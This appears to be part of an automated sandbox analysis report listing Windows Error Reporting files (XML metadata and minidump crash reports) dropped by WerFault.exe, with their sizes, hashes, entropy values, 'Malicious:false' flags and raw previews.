                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER76CF.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.470885526084952
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjA8fm8M4JbUZFy+An7+q86mYrZMjT4d:uITfjvqagrsqYpJw/a76YrZMX4d
                                                          MD5:5853C04112C7D101464A80E9911823D8
                                                          SHA1:0C751F203D0528683B5CA00B4F8B0B91DEA0D043
                                                          SHA-256:98A3125A6DBE881651C2F5B5AB942A5FDF41FFA5CA8670EEE563316C38392537
                                                          SHA-512:B1AE36D59CCBF2D35B85F2D79BBCEB458539B17ABC853FDE833999E7AF69754FB04CFE2672E9389F9FF09F14D1E20441B4A94EF76C89F639D7FDAC14AC1438CF
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F87.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:13 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):79260
                                                          Entropy (8bit):2.043851295321239
                                                          Encrypted:false
                                                          SSDEEP:384:ZaAw4xnkPORZwt2PV74vBNqkYPSKhQ3qNLkk2ZGDIanedh:QAlkPORZc2yMPXhaGokbwdh
                                                          MD5:934E60D0897B97BCFB63AF232B0936C7
                                                          SHA1:9E8CCAB034A3F18F6F23D039AE789897A0490D6E
                                                          SHA-256:A803A868276950AEFF0530C4340B02ADD05567254E00E9DE50DA043C4AE38362
                                                          SHA-512:F1E7130FE456E30744CD59DABAFE58D76BA3E86E5DF6C82FCD3A1926881AC27971551D1C7D3E73913ED7EA2A206796BF811F775EFC8ABBAA625CED53FA100B93
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c........................4................7..........T.......8...........T...........p...,............................................................................................U...........B......D.......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER8209.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8326
                                                          Entropy (8bit):3.7003878701766695
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Cy6z6YqoSU2DgmfB0SeBCpBB89bGEsfvCm:RrlsNiM6z6YlSU2DgmfOSKG3fr
                                                          MD5:3DAE7B32A2A393D20635E02AFFF0998E
                                                          SHA1:F963C42C10FB42E885A53A9D70FFA9A845ED4E9C
                                                          SHA-256:F0A07E8BFE0E67E09CF9FC22C3A116AF04D557E193D50986896E9B909ACC9218
                                                          SHA-512:9F7C92EB47661D34B01AF78FE47AB8FCE8D5BE3C1CCA49F2FF22E963A7C86D164EB098313EBD5B085D0B347FBDE2917EDCB06F5F99C00145DDBFD098474DEB2B
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER83CF.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.470253258197518
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjqK/8fm8M4JbUZF/+q86mYrZMjT4d:uITfjvqagrsqYlkJwD6YrZMX4d
                                                          MD5:A2D968C7066562D3C0C554DC56259D0B
                                                          SHA1:2804EEED188AF4DB05B2CBDFC5189136A98C743B
                                                          SHA-256:2AEFAD63EF21C9EBFFAAC8109A29BBE3F684CAABD90F079F5DB3CC1E8E2712AA
                                                          SHA-512:6DB4398F180ACCD4FADD58C93E025DCFDA64A3ECA317619CF625F67C97025F9A0F9D7C1ACA6F189B47A2A71BFCDA0A3238562707D67C135587615CBF93B34185
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER99E1.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:33:26 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):112722
                                                          Entropy (8bit):2.0591438878706567
                                                          Encrypted:false
                                                          SSDEEP:384:RBMoyPHPwPZ8zNAjGOMvDbVqfTY9aeyqNL8H2eGoXA/+TPZ8FfuNmcE7XdV9d/d:oPFNAkMYryGAHIoJE7N
                                                          MD5:C0ABF883DE8CA88D30E561D728EE0ADA
                                                          SHA1:42A484F64C4C1E8548F9746B774D0F8A959803F3
                                                          SHA-256:DC0842291C67C964B6B4C9A10A5E09980A144BF1AE2F2E2B1737596CF1A730AE
                                                          SHA-512:9A15AB3661BBC9D4A495FA333651C6030217FCFD3BAEC95F12F2A32A1EFA6FE6140F5FE8B7EC7A634522BBD98E717AE2ED9AB563CD9AB493940E554D770F83CA
                                                          Malicious:false
                                                          Preview:MDMP....... .......V.;c............D...............L...........LM..........T.......8...........T........... ;..2}........... ..........."...................................................................U...........B......."......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9A91.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:20 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):79292
                                                          Entropy (8bit):2.0847780570262655
                                                          Encrypted:false
                                                          SSDEEP:384:yeAw4wMhPCzZUV7jFvBUqkYPHehQ3qNLkk25GO8K0hw3PQW:pAfPCzIFBP+haGokPQ0hw3P
                                                          MD5:F212FF51EE38B4D31D2AAE1E0D90A2B5
                                                          SHA1:58463935BFA2EE61338020546D21A4E1F4C0E91A
                                                          SHA-256:4297FD8421CCE432513AFA02430CD875A91229C86D599FF6504DF0062D5EA5B5
                                                          SHA-512:7D7033DB86A49B71E16F88C5653AB120B37587C3E509E389752C3B091D6FB2C2C752B9F4C2D8447EA65BE55D81109A937EF4A35B100B4AEFE9E648203D9B1B46
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c........................4................7..........T.......8...........T............................................................................................................U...........B......D.......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D51.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8326
                                                          Entropy (8bit):3.7033457187750933
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Ce6p6YqmQSUVTgmfB0SeBCpBq89bOEsf66m:RrlsNiQ6p6Y9QSUVTgmfOSXO3f+
                                                          MD5:16EEAA4B3326849450F4817162A745C5
                                                          SHA1:1A6365771D038FC1041C32E0FC2A308355466155
                                                          SHA-256:28AD7E83812A14E5D9D5B6AB59407F48BF0E20C74217C370AE3805633CEBFA5B
                                                          SHA-512:55F89FEE3EA58A35B14120139DE643F690E3FD1AF7E80ECCCF091FBD8AF5D7DF4D9BB0EC71A914AB1821462BE443351F92009A8EC8329369FE25D481BC424EBF
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EAA.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.469699590985047
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsRJgtWI9UqrWgc8sqYjN8fm8M4JbUZFt+q86mYrZMjT4d:uITfjvqagrsqY+Jwx6YrZMX4d
                                                          MD5:4846B810F3F30A775E63E4EE6F3C95C3
                                                          SHA1:CBA2B21637A19FA1DA515B3B5F475528CD86A967
                                                          SHA-256:A7546014200D6A93E9357E5E2EEC488A5A0313346CE2D4430335B60D533F753F
                                                          SHA-512:1A6AA0AFBE5828B962399B9147E6623541CE7665D451CF176B7A30052C0C3F6D3BFA4CC3D77A90F033210036BFC21915C929D36DD5BFBF103835B478A59E9C08
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719942" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9EF2.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8338
                                                          Entropy (8bit):3.700809895921402
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6Ch6PO66YqCSUs4ggmfBnSR1aBCpBM89bpEsf1Dm:RrlsNiv6L6YPSUMgmfBSTJp3fs
                                                          MD5:A143CDBC5C625A98DD040606E5AE9ECA
                                                          SHA1:6811091944DB4DCA934D3F75D537E858C3A52655
                                                          SHA-256:B633BF27E6595F2EC6621FA0C10A47BDAA2B4747D5F8D9DC944EA417478B17D5
                                                          SHA-512:4D16CE2DCE89E2ED8C0DFC5463A3BE61014BBB32756EF0DD00532EDD37E05E211C7357F5BCDC540754A5113193DEBDAD29E54C515034501A6790F26132243359
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FBF.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.470694493480002
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsgiJgtWI9UqrWgc8sqYjl8fm8M4JbRZFPss+q8JmYrZMjT4d:uITfgwvqagrsqYGJ9L3YrZMX4d
                                                          MD5:FB37F1F09DEBCB91F32273D0B7C179AE
                                                          SHA1:517ECF53279353A97C6535F238D9882F61FC4398
                                                          SHA-256:62BB8C1638AFA7EA7E5A39EED9CEB8F9C1DE4383C6A5A0B470E7A923DDEDF5A8
                                                          SHA-512:D9F881062A8D9C32E57D9B2A972293E71601D9686A55D2288F77CBE2D29B013048ADC0C6ED1E6FF6EA13BAAAF94A53085FB1F54714DE3A671BF6185360B01A2D
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719944" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERA688.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:23 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):85970
                                                          Entropy (8bit):2.043184900863757
                                                          Encrypted:false
                                                          SSDEEP:384:UDkjX7XPFUDyCvBJqcYPGt93qNLkH2CGCpPnCy+YT:UCX7XPWBIPYGoHMaCwT
                                                          MD5:A878D36D0648EA35F5883DA30AFBBBC3
                                                          SHA1:3CDD8C0B168CB4C53B0F296F5EDA5870E10E79E3
                                                          SHA-256:96A919B80C8D1A4A41641B1750171DA12FC9F2AEC90BEE6D35B950676757E977
                                                          SHA-512:5F0BB6C4A5E4D3937E72024AF1712A19F287F2B091F353E426FFDFD179D608EF382871176643C31849E3685A9194D2CFB2366EDBA8AD1B91443C17F1E2326C57
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c........................x...............H<..........T.......8...........T...........P$...+..........4........... ....................................................................U...........B..............GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB3C.tmp.WERInternalMetadata.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):8330
                                                          Entropy (8bit):3.701999164799548
                                                          Encrypted:false
                                                          SSDEEP:192:Rrl7r3GLNi6CD6IkW6YqWSUYsgmfB0SeBCpBG89bqEsfOum:RrlsNit6IkW6YbSUYsgmfOSLq3f+
                                                          MD5:18B0CE3057D005D22F8C210B16C96C8D
                                                          SHA1:AA979E74A802666AD8F3878B8582AFD6E30B507B
                                                          SHA-256:A670EF8079D00859411DFBD5BB8EF08C105E50753F6DC5914E9FAA30A567DF00
                                                          SHA-512:A3447ACC171AED50EE9D577AE114D7BF38549F4177425C4CBF1D0128528788E3DE387A1ABB4C76CC1F0A5817BDDCE758D42F8CAC06D28266E32FE1CC6183C015
                                                          Malicious:false
                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.8.0.<./.P.i.d.>.......

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC08.tmp.xml

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):4573
                                                          Entropy (8bit):4.472315233340739
                                                          Encrypted:false
                                                          SSDEEP:48:cvIwSD8zsKJgtWI9UqrWgc8sqYjwE8fm8M4JbUZFF+q86mYrZMjT4d:uITfYvqagrsqYkpJwp6YrZMX4d
                                                          MD5:0C58F25AFE3E1C6894F5454946ABAFCF
                                                          SHA1:3607B0A3CA164407C98B45AF5E1AA5E0FBD4BB61
                                                          SHA-256:CEE6E175E5E0A59020B9611870BF8629F3FBB88BDBB0540CBF8CA5390A5D74EE
                                                          SHA-512:9DC86B9CC95BED9456833EA42CBF16A72724FDC9B780F2D5D195DE557B420F3205313DDDD50837A90AF64F47FA5D9D1FB3F677326F238D217A6936690C1FB6A1
                                                          Malicious:false
                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719943" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WERB2DC.tmp.dmp

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:32:26 2022, 0x1205a4 type
                                                          Category:dropped
                                                          Size (bytes):97856
                                                          Entropy (8bit):2.135212349737603
                                                          Encrypted:false
                                                          SSDEEP:384:btZPVR2GkdzhI8Avi7qcTYARJ3qNLkH2CGrdvgUJQjfioV2j4viLq:fPwFWl0YqGoHMXR9
                                                          MD5:F5205326F694B498FC62B08FEC394882
                                                          SHA1:DC722921CD4B6D5960E6B0446F498EDB94D26A39
                                                          SHA-256:D28147703B196C3E3DBA5826B6AA9A3F959CA0CBBD3A8C814C024F55495FA779
                                                          SHA-512:D8675B51D70A6C8C5390FD2C9FD4A9653A4464BB6AD18699416044B6A49F0041524FA6B46F3C29DE36795FF584B68D3CE79E60CCD4433672056F45CD9F6AA3B8
                                                          Malicious:false
                                                          Preview:MDMP....... .........;c.........................................@..........T.......8...........T............)..PT...........................................................................................U...........B......,.......GenuineIntelW...........T............~;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

